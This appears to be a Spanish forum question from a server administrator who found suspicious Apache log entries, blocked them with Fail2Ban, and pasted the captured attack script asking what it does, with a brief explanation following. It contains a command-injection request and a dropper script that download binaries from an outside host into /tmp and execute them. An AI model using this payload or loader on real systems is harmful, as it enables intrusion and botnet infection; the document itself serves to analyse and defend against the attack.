He estado notando en mis servidores registros de apache, las siguientes líneas extrañas últimamente:
156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
Así que hice un filtro Fail2Ban personalizado y comencé a prohibir las direcciones IP que solicitaban estas URL /login.cgi.
Pero tenía curiosidad por saber qué estaban tratando de hacer, así que saqué el guión que intentaban ejecutar y parece que no puedo entender qué hace exactamente. ¿Algo sobre la eliminación de carpetas de archivo en / var y / tmp?
De todos modos, aquí está:
#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server:$http_port/$name -O -> $u
./$u $name
done
hxxp://80.211.173.159:80/$name
donde se $name
encuentra cada una de las arquitecturas de CPU bin_names
. Por lo tanto, se descargarán y ejecutarán 7 scripts de ataque